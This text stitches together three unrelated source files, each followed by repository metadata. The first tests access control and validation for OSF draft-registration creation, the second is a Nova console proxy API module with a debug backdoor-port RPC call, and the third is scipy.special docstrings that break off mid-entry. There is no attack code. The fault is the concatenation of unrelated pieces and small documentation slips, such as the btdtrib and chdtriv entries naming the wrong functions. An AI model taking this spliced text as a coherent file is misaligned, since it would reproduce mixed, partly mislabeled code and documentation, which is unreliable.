def test_type_is_draft_registrations(self, app, user, metaschema_open_ended, url_draft_registrations):
draft_data = {
'data': {
'type': 'nodes',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 409
def test_admin_can_create_draft(self, app, user, project_public, payload, metaschema_open_ended):
url = '/{}nodes/{}/draft_registrations/?embed=branched_from&embed=initiator'.format(API_BASE, project_public._id)
res = app.post_json_api(url, payload, auth=user.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['registration_supplement'] == metaschema_open_ended._id
assert data['attributes']['registration_metadata'] == {}
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_cannot_create_draft(self, app, user_write_contrib, user_read_contrib, user_non_contrib, project_public, payload, url_draft_registrations):
# test_write_only_contributor_cannot_create_draft
assert user_write_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user_write_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_read_only_contributor_cannot_create_draft
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user_read_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_non_authenticated_user_cannot_create_draft
res = app.post_json_api(url_draft_registrations, payload, expect_errors=True)
assert res.status_code == 401
# test_logged_in_non_contributor_cannot_create_draft
res = app.post_json_api(url_draft_registrations, payload, auth=user_non_contrib.auth, expect_errors=True)
assert res.status_code == 403
def test_registration_supplement_errors(self, app, user, url_draft_registrations):
# test_registration_supplement_not_found
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': 'Invalid schema'
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 404
# test_registration_supplement_must_be_active_metaschema
schema = MetaSchema.objects.get(name='Election Research Preacceptance Competition', active=False)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
# test_registration_supplement_must_be_most_recent_metaschema
schema = MetaSchema.objects.get(name='Open-Ended Registration', schema_version=1)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
def test_cannot_create_draft_errors(self, app, user, project_public, payload):
# test_cannot_create_draft_from_a_registration
registration = RegistrationFactory(project=project_public, creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(API_BASE, registration._id)
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 404
# test_cannot_create_draft_from_deleted_node
project = ProjectFactory(is_public=True, creator=user)
project.is_deleted = True
project.save()
url_project = '/{}nodes/{}/draft_registrations/'.format(API_BASE, project._id)
res = app.post_json_api(url_project, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 410
assert res.json['errors'][0]['detail'] == 'The requested node is no longer available.'
# test_cannot_create_draft_from_collection
collection = CollectionFactory(creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(API_BASE, collection._id)
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 404
def test_required_metaschema_questions_not_required_on_post(self, app, user, project_public, prereg_metadata):
prereg_schema = MetaSchema.objects.get(name='Prereg Challenge', schema_version=LATEST_SCHEMA_VERSION)
prereg_draft_registration = DraftRegistrationFactory(
initiator=user,
registration_schema=prereg_schema,
branched_from=project_public
)
url = '/{}nodes/{}/draft_registrations/?embed=initiator&embed=branched_from'.format(API_BASE, project_public._id)
registration_metadata = prereg_metadata(prereg_draft_registration)
del registration_metadata['q1']
prereg_draft_registration.registration_metadata = registration_metadata
prereg_draft_registration.save()
payload = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': prereg_schema._id,
'registration_metadata': registration_metadata
}
}
}
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 201
data = res.json['data']
assert res.json['data']['attributes']['registration_metadata']['q2']['value'] == 'Test response'
assert data['attributes']['registration_supplement'] == prereg_schema._id
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_registration_supplement_must_be_supplied(self, app, user, url_draft_registrations):
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'This field is required.'
assert errors['source']['pointer'] == '/data/attributes/registration_supplement'
def test_registration_metadata_must_be_a_dictionary(self, app, user, payload, url_draft_registrations):
payload['data']['attributes']['registration_metadata'] = 'Registration data'
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['source']['pointer'] == '/data/attributes/registration_metadata'
assert errors['detail'] == 'Expected a dictionary of items but got type "unicode".'
def test_registration_metadata_question_values_must_be_dictionaries(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = 'No, data collection has not begun'
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'No, data collection has not begun\' is not of type \'object\''
def test_registration_metadata_question_keys_must_be_value(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'incorrect_key': 'No, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'incorrect_key\' was unexpected)'
def test_question_in_registration_metadata_must_be_in_schema(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['q11'] = {
'value': 'No, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'q11\' was unexpected)'
def test_multiple_choice_question_value_must_match_value_in_schema(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'value': 'Nope, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'Nope, data collection has not begun\' is not one of [u\'No, data collection has not begun\', u\'Yes, data collection is underway or complete\']'
def test_reviewer_cannot_create_draft_registration(self, app, user_read_contrib, project_public, payload, url_draft_registrations):
user = AuthUserFactory()
user.add_system_tag(PREREG_ADMIN_TAG)
user.save()
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 403
| {
"content_hash": "593a2f2132768e81ea02ce80efafca5d",
"timestamp": "",
"source": "github",
"line_count": 379,
"max_line_length": 183,
"avg_line_length": 46.6490765171504,
"alnum_prop": 0.6463800904977376,
"repo_name": "chrisseto/osf.io",
"id": "e7a02770d512911796f9a237195cf4b58f2e98da",
"size": "17680",
"binary": false,
"copies": "2",
"ref": "refs/heads/feature/reviews",
"path": "api_tests/nodes/views/test_node_draft_registration_list.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "144093"
},
{
"name": "HTML",
"bytes": "211713"
},
{
"name": "JavaScript",
"bytes": "1740074"
},
{
"name": "Mako",
"bytes": "592713"
},
{
"name": "Perl",
"bytes": "13885"
},
{
"name": "Python",
"bytes": "7895181"
}
],
"symlink_target": ""
} |
"""Handles ConsoleProxy API requests."""
from oslo.config import cfg
from nova.compute import rpcapi as compute_rpcapi
from nova.console import rpcapi as console_rpcapi
from nova.db import base
from nova.openstack.common import rpc
from nova.openstack.common import uuidutils
CONF = cfg.CONF
CONF.import_opt('console_topic', 'nova.console.rpcapi')
class API(base.Base):
"""API for spinning up or down console proxy connections."""
def __init__(self, **kwargs):
super(API, self).__init__(**kwargs)
def get_consoles(self, context, instance_uuid):
return self.db.console_get_all_by_instance(context, instance_uuid)
def get_console(self, context, instance_uuid, console_uuid):
return self.db.console_get(context, console_uuid, instance_uuid)
def delete_console(self, context, instance_uuid, console_uuid):
console = self.db.console_get(context, console_uuid, instance_uuid)
topic = rpc.queue_get_for(context, CONF.console_topic,
console['pool']['host'])
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
rpcapi.remove_console(context, console['id'])
def create_console(self, context, instance_uuid):
#NOTE(mdragon): If we wanted to return this the console info
# here, as we would need to do a call.
# They can just do an index later to fetch
# console info. I am not sure which is better
# here.
instance = self._get_instance(context, instance_uuid)
topic = self._get_console_topic(context, instance['host']),
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
rpcapi.add_console(context, instance['id'])
def _get_console_topic(self, context, instance_host):
rpcapi = compute_rpcapi.ComputeAPI()
return rpcapi.get_console_topic(context, instance_host)
def _get_instance(self, context, instance_uuid):
if uuidutils.is_uuid_like(instance_uuid):
instance = self.db.instance_get_by_uuid(context, instance_uuid)
else:
instance = self.db.instance_get(context, instance_uuid)
return instance
def get_backdoor_port(self, context, host):
topic = self._get_console_topic(context, host)
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
return rpcapi.get_backdoor_port(context, host)
| {
"content_hash": "b3fd7f2ba001ee15c4d60d4be56d5840",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 75,
"avg_line_length": 40.983050847457626,
"alnum_prop": 0.6559139784946236,
"repo_name": "zestrada/nova-cs498cc",
"id": "91966a7ff7dd9efe77fe5fcaf50739781308afbe",
"size": "3103",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "nova/console/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "9215416"
},
{
"name": "Shell",
"bytes": "17117"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
docdict = {}
def get(name):
return docdict.get(name)
def add_newdoc(place, name, doc):
docdict['.'.join((place, name))] = doc
add_newdoc("scipy.special", "_lambertw",
"""
Internal function, use `lambertw` instead.
""")
add_newdoc("scipy.special", "airy",
"""
airy(z)
Airy functions and their derivatives.
Parameters
----------
z : float or complex
Argument.
Returns
-------
Ai, Aip, Bi, Bip
Airy functions Ai and Bi, and their derivatives Aip and Bip
Notes
-----
The Airy functions Ai and Bi are two independent solutions of y''(x) = x y.
""")
add_newdoc("scipy.special", "airye",
"""
airye(z)
Exponentially scaled Airy functions and their derivatives.
Scaling::
eAi = Ai * exp(2.0/3.0*z*sqrt(z))
eAip = Aip * exp(2.0/3.0*z*sqrt(z))
eBi = Bi * exp(-abs((2.0/3.0*z*sqrt(z)).real))
eBip = Bip * exp(-abs((2.0/3.0*z*sqrt(z)).real))
Parameters
----------
z : float or complex
Argument.
Returns
-------
eAi, eAip, eBi, eBip
Airy functions Ai and Bi, and their derivatives Aip and Bip
""")
add_newdoc("scipy.special", "bdtr",
"""
bdtr(k, n, p)
Binomial distribution cumulative distribution function.
Sum of the terms 0 through k of the Binomial probability density.
::
y = sum(nCj p**j (1-p)**(n-j),j=0..k)
Parameters
----------
k, n : int
Terms to include
p : float
Probability
Returns
-------
y : float
Sum of terms
""")
add_newdoc("scipy.special", "bdtrc",
"""
bdtrc(k, n, p)
Binomial distribution survival function.
Sum of the terms k+1 through n of the Binomial probability density
::
y = sum(nCj p**j (1-p)**(n-j), j=k+1..n)
Parameters
----------
k, n : int
Terms to include
p : float
Probability
Returns
-------
y : float
Sum of terms
""")
add_newdoc("scipy.special", "bdtri",
"""
bdtri(k, n, y)
Inverse function to bdtr vs. p
Finds probability `p` such that for the cumulative binomial
probability ``bdtr(k, n, p) == y``.
""")
add_newdoc("scipy.special", "bdtrik",
"""
bdtrik(y, n, p)
Inverse function to bdtr vs k
""")
add_newdoc("scipy.special", "bdtrin",
"""
bdtrin(k, y, p)
Inverse function to bdtr vs n
""")
add_newdoc("scipy.special", "binom",
"""
binom(n, k)
Binomial coefficient
""")
add_newdoc("scipy.special", "btdtria",
"""
btdtria(p, b, x)
Inverse of btdtr vs a
""")
add_newdoc("scipy.special", "btdtrib",
"""
btdtria(a, p, x)
Inverse of btdtr vs b
""")
add_newdoc("scipy.special", "bei",
"""
bei(x)
Kelvin function bei
""")
add_newdoc("scipy.special", "beip",
"""
beip(x)
Derivative of the Kelvin function bei
""")
add_newdoc("scipy.special", "ber",
"""
ber(x)
Kelvin function ber.
""")
add_newdoc("scipy.special", "berp",
"""
berp(x)
Derivative of the Kelvin function ber
""")
add_newdoc("scipy.special", "besselpoly",
r"""
besselpoly(a, lmb, nu)
Weighed integral of a Bessel function.
.. math::
\int_0^1 x^\lambda J_v(\nu, 2 a x) \, dx
where :math:`J_v` is a Bessel function and :math:`\lambda=lmb`,
:math:`\nu=nu`.
""")
add_newdoc("scipy.special", "beta",
"""
beta(a, b)
Beta function.
::
beta(a,b) = gamma(a) * gamma(b) / gamma(a+b)
""")
add_newdoc("scipy.special", "betainc",
"""
betainc(a, b, x)
Incomplete beta integral.
Compute the incomplete beta integral of the arguments, evaluated
from zero to x::
gamma(a+b) / (gamma(a)*gamma(b)) * integral(t**(a-1) (1-t)**(b-1), t=0..x).
Notes
-----
The incomplete beta is also sometimes defined without the terms
in gamma, in which case the above definition is the so-called regularized
incomplete beta. Under this definition, you can get the incomplete beta by
multiplying the result of the scipy function by beta(a, b).
""")
add_newdoc("scipy.special", "betaincinv",
"""
betaincinv(a, b, y)
Inverse function to beta integral.
Compute x such that betainc(a,b,x) = y.
""")
add_newdoc("scipy.special", "betaln",
"""
betaln(a, b)
Natural logarithm of absolute value of beta function.
Computes ``ln(abs(beta(x)))``.
""")
add_newdoc("scipy.special", "boxcox",
"""
boxcox(x, lmbda)
Compute the Box-Cox transformation.
The Box-Cox transformation is::
y = (x**lmbda - 1) / lmbda if lmbda != 0
log(x) if lmbda == 0
Returns `nan` if ``x < 0``.
Returns `-inf` if ``x == 0`` and ``lmbda < 0``.
.. versionadded:: 0.14.0
Parameters
----------
x : array_like
Data to be transformed.
lmbda : array_like
Power parameter of the Box-Cox transform.
Returns
-------
y : array
Transformed data.
Examples
--------
>>> boxcox([1, 4, 10], 2.5)
array([ 0. , 12.4 , 126.09110641])
>>> boxcox(2, [0, 1, 2])
array([ 0.69314718, 1. , 1.5 ])
""")
add_newdoc("scipy.special", "boxcox1p",
"""
boxcox1p(x, lmbda)
Compute the Box-Cox transformation of 1 + `x`.
The Box-Cox transformation computed by `boxcox1p` is::
y = ((1+x)**lmbda - 1) / lmbda if lmbda != 0
log(1+x) if lmbda == 0
Returns `nan` if ``x < -1``.
Returns `-inf` if ``x == -1`` and ``lmbda < 0``.
.. versionadded:: 0.14.0
Parameters
----------
x : array_like
Data to be transformed.
lmbda : array_like
Power parameter of the Box-Cox transform.
Returns
-------
y : array
Transformed data.
Examples
--------
>> boxcox1p(1e-4, [0, 0.5, 1])
array([ 9.99950003e-05, 9.99975001e-05, 1.00000000e-04])
>>> boxcox1p([0.01, 0.1], 0.25)
array([ 0.00996272, 0.09645476])
""")
add_newdoc("scipy.special", "btdtr",
"""
btdtr(a,b,x)
Cumulative beta distribution.
Returns the area from zero to x under the beta density function::
gamma(a+b)/(gamma(a)*gamma(b)))*integral(t**(a-1) (1-t)**(b-1), t=0..x)
See Also
--------
betainc
""")
add_newdoc("scipy.special", "btdtri",
"""
btdtri(a,b,p)
p-th quantile of the beta distribution.
This is effectively the inverse of btdtr returning the value of x for which
``btdtr(a,b,x) = p``
See Also
--------
betaincinv
""")
add_newdoc("scipy.special", "cbrt",
"""
cbrt(x)
Cube root of x
""")
add_newdoc("scipy.special", "chdtr",
"""
chdtr(v, x)
Chi square cumulative distribution function
Returns the area under the left hand tail (from 0 to x) of the Chi
square probability density function with v degrees of freedom::
1/(2**(v/2) * gamma(v/2)) * integral(t**(v/2-1) * exp(-t/2), t=0..x)
""")
add_newdoc("scipy.special", "chdtrc",
"""
chdtrc(v,x)
Chi square survival function
Returns the area under the right hand tail (from x to
infinity) of the Chi square probability density function with v
degrees of freedom::
1/(2**(v/2) * gamma(v/2)) * integral(t**(v/2-1) * exp(-t/2), t=x..inf)
""")
add_newdoc("scipy.special", "chdtri",
"""
chdtri(v,p)
Inverse to chdtrc
Returns the argument x such that ``chdtrc(v,x) == p``.
""")
add_newdoc("scipy.special", "chdtriv",
"""
chdtri(p, x)
Inverse to chdtr vs v
Returns the argument v such that ``chdtr(v, x) == p``.
""")
add_newdoc("scipy.special", "chndtr",
"""
chndtr(x, df, nc)
Non-central chi square cumulative distribution function
""")
add_newdoc("scipy.special", "chndtrix",
"""
chndtrix(p, df, nc)
Inverse to chndtr vs x
""")
add_newdoc("scipy.special", "chndtridf",
"""
chndtridf(x, p, nc)
Inverse to chndtr vs df
""")
add_newdoc("scipy.special", "chndtrinc",
"""
chndtrinc(x, df, p)
Inverse to chndtr vs nc
""")
add_newdoc("scipy.special", "cosdg",
"""
cosdg(x)
Cosine of the angle x given in degrees.
""")
add_newdoc("scipy.special", "cosm1",
"""
cosm1(x)
cos(x) - 1 for use when x is near zero.
""")
add_newdoc("scipy.special", "cotdg",
"""
cotdg(x)
Cotangent of the angle x given in degrees.
""")
add_newdoc("scipy.special", "dawsn",
"""
dawsn(x)
Dawson's integral.
Computes::
exp(-x**2) * integral(exp(t**2),t=0..x).
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "ellipe",
"""
ellipe(m)
Complete elliptic integral of the second kind
::
integral(sqrt(1-m*sin(t)**2),t=0..pi/2)
""")
add_newdoc("scipy.special", "ellipeinc",
"""
ellipeinc(phi,m)
Incomplete elliptic integral of the second kind
::
integral(sqrt(1-m*sin(t)**2),t=0..phi)
""")
add_newdoc("scipy.special", "ellipj",
"""
ellipj(u, m)
Jacobian elliptic functions
Calculates the Jacobian elliptic functions of parameter m between
0 and 1, and real u.
Parameters
----------
m, u
Parameters
Returns
-------
sn, cn, dn, ph
The returned functions::
sn(u|m), cn(u|m), dn(u|m)
The value ``ph`` is such that if ``u = ellik(ph, m)``,
then ``sn(u|m) = sin(ph)`` and ``cn(u|m) = cos(ph)``.
""")
add_newdoc("scipy.special", "ellipkm1",
"""
ellipkm1(p)
The complete elliptic integral of the first kind around m=1.
This function is defined as
.. math:: K(p) = \\int_0^{\\pi/2} [1 - m \\sin(t)^2]^{-1/2} dt
where `m = 1 - p`.
Parameters
----------
p : array_like
Defines the parameter of the elliptic integral as m = 1 - p.
Returns
-------
K : array_like
Value of the elliptic integral.
See Also
--------
ellipk
""")
add_newdoc("scipy.special", "ellipkinc",
"""
ellipkinc(phi, m)
Incomplete elliptic integral of the first kind
::
integral(1/sqrt(1-m*sin(t)**2),t=0..phi)
""")
add_newdoc("scipy.special", "erf",
"""
erf(z)
Returns the error function of complex argument.
It is defined as ``2/sqrt(pi)*integral(exp(-t**2), t=0..z)``.
Parameters
----------
x : ndarray
Input array.
Returns
-------
res : ndarray
The values of the error function at the given points x.
See Also
--------
erfc, erfinv, erfcinv
Notes
-----
The cumulative of the unit normal distribution is given by
``Phi(z) = 1/2[1 + erf(z/sqrt(2))]``.
References
----------
.. [1] http://en.wikipedia.org/wiki/Error_function
.. [2] Milton Abramowitz and Irene A. Stegun, eds.
Handbook of Mathematical Functions with Formulas,
Graphs, and Mathematical Tables. New York: Dover,
1972. http://www.math.sfu.ca/~cbm/aands/page_297.htm
.. [3] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfc",
"""
erfc(x)
Complementary error function, 1 - erf(x).
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfi",
"""
erfi(z)
Imaginary error function, -i erf(i z).
.. versionadded:: 0.12.0
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfcx",
"""
erfcx(x)
Scaled complementary error function, exp(x^2) erfc(x).
.. versionadded:: 0.12.0
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "eval_jacobi",
"""
eval_jacobi(n, alpha, beta, x, out=None)
Evaluate Jacobi polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_jacobi",
"""
eval_sh_jacobi(n, p, q, x, out=None)
Evaluate shifted Jacobi polynomial at a point.
""")
add_newdoc("scipy.special", "eval_gegenbauer",
"""
eval_gegenbauer(n, alpha, x, out=None)
Evaluate Gegenbauer polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebyt",
"""
eval_chebyt(n, x, out=None)
Evaluate Chebyshev T polynomial at a point.
This routine is numerically stable for `x` in ``[-1, 1]`` at least
up to order ``10000``.
""")
add_newdoc("scipy.special", "eval_chebyu",
"""
eval_chebyu(n, x, out=None)
Evaluate Chebyshev U polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebys",
"""
eval_chebys(n, x, out=None)
Evaluate Chebyshev S polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebyc",
"""
eval_chebyc(n, x, out=None)
Evaluate Chebyshev C polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_chebyt",
"""
eval_sh_chebyt(n, x, out=None)
Evaluate shifted Chebyshev T polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_chebyu",
"""
eval_sh_chebyu(n, x, out=None)
Evaluate shifted Chebyshev U polynomial at a point.
""")
add_newdoc("scipy.special", "eval_legendre",
"""
eval_legendre(n, x, out=None)
Evaluate Legendre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_legendre",
"""
eval_sh_legendre(n, x, out=None)
Evaluate shifted Legendre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_genlaguerre",
"""
eval_genlaguerre(n, alpha, x, out=None)
Evaluate generalized Laguerre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_laguerre",
"""
eval_laguerre(n, x, out=None)
Evaluate Laguerre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_hermite",
"""
eval_hermite(n, x, out=None)
Evaluate Hermite polynomial at a point.
""")
add_newdoc("scipy.special", "eval_hermitenorm",
"""
eval_hermitenorm(n, x, out=None)
Evaluate normalized Hermite polynomial at a point.
""")
add_newdoc("scipy.special", "exp1",
"""
exp1(z)
Exponential integral E_1 of complex argument z
::
integral(exp(-z*t)/t,t=1..inf).
""")
add_newdoc("scipy.special", "exp10",
"""
exp10(x)
10**x
""")
add_newdoc("scipy.special", "exp2",
"""
exp2(x)
2**x
""")
add_newdoc("scipy.special", "expi",
"""
expi(x)
Exponential integral Ei
Defined as::
integral(exp(t)/t,t=-inf..x)
See `expn` for a different exponential integral.
""")
add_newdoc('scipy.special', 'expit',
"""
expit(x)
Expit ufunc for ndarrays.
The expit function, also known as the logistic function, is defined as
expit(x) = 1/(1+exp(-x)). It is the inverse of the logit function.
.. versionadded:: 0.10.0
Parameters
----------
x : ndarray
The ndarray to apply expit to element-wise.
Returns
-------
out : ndarray
An ndarray of the same shape as x. Its entries
are expit of the corresponding entry of x.
Notes
-----
As a ufunc logit takes a number of optional
keyword arguments. For more information
see `ufuncs <http://docs.scipy.org/doc/numpy/reference/ufuncs.html>`_
""")
add_newdoc("scipy.special", "expm1",
"""
expm1(x)
exp(x) - 1 for use when x is near zero.
""")
add_newdoc("scipy.special", "expn",
"""
expn(n, x)
Exponential integral E_n
Returns the exponential integral for integer n and non-negative x and n::
integral(exp(-x*t) / t**n, t=1..inf).
""")
add_newdoc("scipy.special", "fdtr",
"""
fdtr(dfn, dfd, x)
F cumulative distribution function
Returns the area from zero to x under the F density function (also
known as Snedcor's density or the variance ratio density). This
is the density of X = (unum/dfn)/(uden/dfd), where unum and uden
are random variables having Chi square distributions with dfn and
dfd degrees of freedom, respectively.
""")
add_newdoc("scipy.special", "fdtrc",
"""
fdtrc(dfn, dfd, x)
F survival function
Returns the complemented F distribution function.
""")
add_newdoc("scipy.special", "fdtri",
"""
fdtri(dfn, dfd, p)
Inverse to fdtr vs x
Finds the F density argument x such that ``fdtr(dfn, dfd, x) == p``.
""")
add_newdoc("scipy.special", "fdtridfd",
"""
fdtridfd(dfn, p, x)
Inverse to fdtr vs dfd
Finds the F density argument dfd such that ``fdtr(dfn,dfd,x) == p``.
""")
add_newdoc("scipy.special", "fdtridfn",
"""
fdtridfn(p, dfd, x)
Inverse to fdtr vs dfn
finds the F density argument dfn such that ``fdtr(dfn,dfd,x) == p``.
""")
add_newdoc("scipy.special", "fresnel",
"""
fresnel(z)
Fresnel sin and cos integrals
Defined as::
ssa = integral(sin(pi/2 * t**2),t=0..z)
csa = integral(cos(pi/2 * t**2),t=0..z)
Parameters
----------
z : float or complex array_like
Argument
Returns
-------
ssa, csa
Fresnel sin and cos integral values
""")
add_newdoc("scipy.special", "gamma",
"""
gamma(z)
Gamma function
The gamma function is often referred to as the generalized
factorial since ``z*gamma(z) = gamma(z+1)`` and ``gamma(n+1) =
n!`` for natural number *n*.
""")
add_newdoc("scipy.special", "gammainc",
"""
gammainc(a, x)
Incomplete gamma function
Defined as::
1 / gamma(a) * integral(exp(-t) * t**(a-1), t=0..x)
`a` must be positive and `x` must be >= 0.
""")
add_newdoc("scipy.special", "gammaincc",
"""
gammaincc(a,x)
Complemented incomplete gamma integral
Defined as::
1 / gamma(a) * integral(exp(-t) * t**(a-1), t=x..inf) = 1 - gammainc(a,x)
`a` must be positive and `x` must be >= 0.
""")
add_newdoc("scipy.special", "gammainccinv",
"""
gammainccinv(a,y)
Inverse to gammaincc
Returns `x` such that ``gammaincc(a,x) == y``.
""")
add_newdoc("scipy.special", "gammaincinv",
"""
gammaincinv(a, y)
Inverse to gammainc
Returns `x` such that ``gammainc(a, x) = y``.
""")
add_newdoc("scipy.special", "gammaln",
"""
gammaln(z)
Logarithm of absolute value of gamma function
Defined as::
ln(abs(gamma(z)))
See Also
--------
gammasgn
""")
add_newdoc("scipy.special", "gammasgn",
"""
gammasgn(x)
Sign of the gamma function.
See Also
--------
gammaln
""")
add_newdoc("scipy.special", "gdtr",
"""
gdtr(a,b,x)
Gamma distribution cumulative density function.
Returns the integral from zero to x of the gamma probability
density function::
a**b / gamma(b) * integral(t**(b-1) exp(-at),t=0..x).
The arguments a and b are used differently here than in other
definitions.
""")
add_newdoc("scipy.special", "gdtrc",
"""
gdtrc(a,b,x)
Gamma distribution survival function.
Integral from x to infinity of the gamma probability density
function.
See Also
--------
gdtr, gdtri
""")
add_newdoc("scipy.special", "gdtria",
"""
gdtria(p, b, x, out=None)
Inverse of gdtr vs a.
Returns the inverse with respect to the parameter `a` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution.
Parameters
----------
p : array_like
Probability values.
b : array_like
`b` parameter values of `gdtr(a, b, x)`. `b` is the "shape" parameter
of the gamma distribution.
x : array_like
Nonnegative real values, from the domain of the gamma distribution.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `a`, `b` and `x`. `out` is then the
array returned by the function.
Returns
-------
a : ndarray
Values of the `a` parameter such that `p = gdtr(a, b, x)`. `1/a`
is the "scale" parameter of the gamma distribution.
See Also
--------
gdtr : CDF of the gamma distribution.
gdtrib : Inverse with respect to `b` of `gdtr(a, b, x)`.
gdtrix : Inverse with respect to `x` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtria(p, 3.4, 5.6)
1.2
""")
add_newdoc("scipy.special", "gdtrib",
"""
gdtrib(a, p, x, out=None)
Inverse of gdtr vs b.
Returns the inverse with respect to the parameter `b` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution.
Parameters
----------
a : array_like
`a` parameter values of `gdtr(a, b, x)`. `1/a` is the "scale"
parameter of the gamma distribution.
p : array_like
Probability values.
x : array_like
Nonnegative real values, from the domain of the gamma distribution.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `a`, `b` and `x`. `out` is then the
array returned by the function.
Returns
-------
b : ndarray
Values of the `b` parameter such that `p = gdtr(a, b, x)`. `b` is
the "shape" parameter of the gamma distribution.
See Also
--------
